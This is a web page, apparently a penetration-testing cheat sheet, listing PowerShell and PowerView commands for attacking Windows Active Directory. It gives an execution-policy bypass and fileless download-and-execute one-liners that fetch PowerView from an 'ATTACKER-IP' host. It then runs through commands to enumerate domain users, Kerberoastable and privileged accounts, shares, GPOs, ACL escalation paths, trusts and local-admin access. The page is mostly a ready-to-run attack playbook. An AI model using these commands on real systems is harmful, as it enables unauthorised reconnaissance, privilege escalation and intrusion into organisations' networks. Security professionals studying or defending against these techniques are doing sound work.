Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

PowerShell Execution Policy Bypass

Allows running unsigned PowerShell scripts in the current process. 
powershell -ep bypass
Start a new PowerShell without profile restrictions. 
powershell.exe -ExecutionPolicy Bypass -NoProfile
Execute PowerView in memory (fileless execution). 
powershell -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/PowerView.ps1')"

Loading PowerView

Start a temporary HTTP server on the attacker machine. 
python3 -m http.server 80
Load PowerView directly into memory. 
IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/PowerView.ps1')
Download the script locally. 
Invoke-WebRequest http://ATTACKER-IP/PowerView.ps1 -OutFile PowerView.ps1
Import the module. 
Import-Module .\PowerView.ps1
Check available command names. 
Get-Command *Domain*

Get-Command *Net*

Domain Enumeration

Get general domain information. 
Get-Domain
Retrieve the domain SID. 
Get-DomainSID
List domain policies. 
Get-DomainPolicy
Show password & lockout policy. 
(Get-DomainPolicy)."SystemAccess"
Show Kerberos configuration. 
(Get-DomainPolicy)."KerberosPolicy"
List domain controllers. 
Get-DomainController
Legacy (old PowerView) Get general domain information. 
Get-NetDomain
Retrieve the domain SID. 
Get-NetDomainSID
List domain policies. 
Get-NetDomainPolicy
List domain controllers. 
Get-NetDomainController

User Enumeration

List domain users. 
Get-DomainUser
Detailed information about a user. 
Get-DomainUser -Identity <user> -Properties *
Find Kerberoastable accounts (SPN users). 
Get-DomainUser -SPN
Identify privileged/protected accounts. 
Get-DomainUser -AdminCount
Accounts trusted for delegation. 
Get-DomainUser -TrustedToAuth
Check logged-on users on a machine. 
Get-NetLoggedon -ComputerName <computer>
Legacy (old PowerView) List domain users. 
Get-NetUser
Get specific user information. 
Get-NetUser -UserName <user>
Find Kerberoastable accounts. 
Get-NetUser -SPN
Find privileged accounts. 
Get-NetUser -AdminCount

Computer Enumeration

List domain computers. 
Get-DomainComputer
Find servers only. 
Get-DomainComputer -OperatingSystem "*Server*"
Last logged-on user of a machine. 
Get-LastLoggedOn -ComputerName <computer>
Legacy (old PowerView) List domain computers. 
Get-NetComputer
Find servers only. 
Get-NetComputer -OperatingSystem "*Server*"

Group Enumeration

List domain groups. 
Get-DomainGroup
Find administrative groups. 
Get-DomainGroup *admin*
List group members. 
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Find groups a user belongs to. 
Get-DomainGroup -UserName <user>
Legacy (old PowerView) List domain groups. 
Get-NetGroup
List members of a group. 
Get-NetGroupMember -GroupName "Domain Admins"

Share Enumeration

Find domain shares. 
Find-DomainShare
Find accessible shares. 
Find-DomainShare -CheckShareAccess
Legacy (old PowerView) Find network shares. 
Invoke-ShareFinder
Locate file servers in the domain. 
Get-NetFileServer

GPO Enumeration

List Group Policy Objects. 
Get-DomainGPO
GPO applied to a computer. 
Get-DomainGPO -ComputerName <computer>
Machines where GPO grants admin rights. 
Find-GPOComputerAdmin -ComputerName <computer>
Where a user has admin rights via GPO. 
Find-GPOLocation -Identity <user>
Legacy (old PowerView) List Group Policy Objects. 
Get-NetGPO

OU Enumeration

List organizational units. 
Get-DomainOU
Legacy (old PowerView) List organizational units. 
Get-NetOU

ACL Enumeration

View permissions on AD objects. 
Get-DomainObjectAcl -Identity <object> -ResolveGUIDs
Find privilege escalation paths. 
Invoke-ACLScanner -ResolveGUIDs
Legacy (old PowerView) View permissions on AD objects. 
Get-ObjectAcl -SamAccountName <object>

Trust Enumeration

Enumerate domain trusts. 
Get-DomainTrust
Map trust relationships. 
Get-DomainTrustMapping
Legacy (old PowerView) Enumerate domain trusts. 
Get-NetDomainTrust

Forest Enumeration

Get forest information. 
Get-Forest
List forest domains. 
Get-ForestDomain
List global catalog servers. 
Get-ForestGlobalCatalog
Legacy (old PowerView) Get forest information. 
Get-NetForest
List forest domains. 
Get-NetForestDomain

Privilege Escalation

Find machines where current user is local admin. 
Find-LocalAdminAccess
Find privileged sessions. 
Invoke-UserHunter
Enumerate local administrators across domain. 
Invoke-EnumerateLocalAdmin
Find unconstrained delegation systems. 
Get-DomainComputer -Unconstrained
Legacy (old PowerView) Find unconstrained delegation systems. 
Get-NetComputer -Unconstrained